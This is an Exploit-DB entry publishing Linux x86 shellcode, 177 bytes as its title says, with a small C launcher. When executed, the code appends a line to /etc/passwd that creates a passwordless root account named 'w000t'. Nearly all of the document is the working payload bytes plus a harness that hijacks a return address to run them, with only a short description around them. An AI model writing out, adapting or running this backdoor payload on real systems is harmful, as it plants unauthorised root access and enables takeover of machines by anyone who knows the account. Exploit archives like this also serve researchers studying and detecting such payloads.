Linux/x86 - Add Root User (w000t) + No Password Shellcode (177 bytes)

2009-01-01T00:00:00
ID EDB-ID:43662
Type exploitdb
Reporter Exploit-DB
Modified 2009-01-01T00:00:00

Description

Linux/x86 - Add Root User (w000t) + No Password Shellcode (177 bytes). Shellcode exploit for Linux_x86 platform

                                        
                                            Linux x86 shellcode that uses execve and echo >> to create a passwordless
root account.


Author: zillion
Email : zillion@safemode.org
Homepage: safemode.org
File: w000t-shell.c



/*
 * This shellcode will add a passwordless local root account 'w000t'
 * Written by zillion@safemode.org
 *
 * Why so big ? it uses execve ;-)
 */

char shellcode[]=
        "\xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88\x46\x47\x89"
        "\x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89\x5e\x51\x89"
        "\x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55\xcd\x80\xe8"
        "\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x2d\x63\x23"
        "\x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30\x30\x30\x74"
        "\x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30\x64\x65\x3a"
        "\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68"
        "\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
        "\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\x44\x44"
        "\x44\x44";



int main()
{

  int *ret;
  ret = (int *)&ret + 2;
  (*ret) = (int)shellcode;
}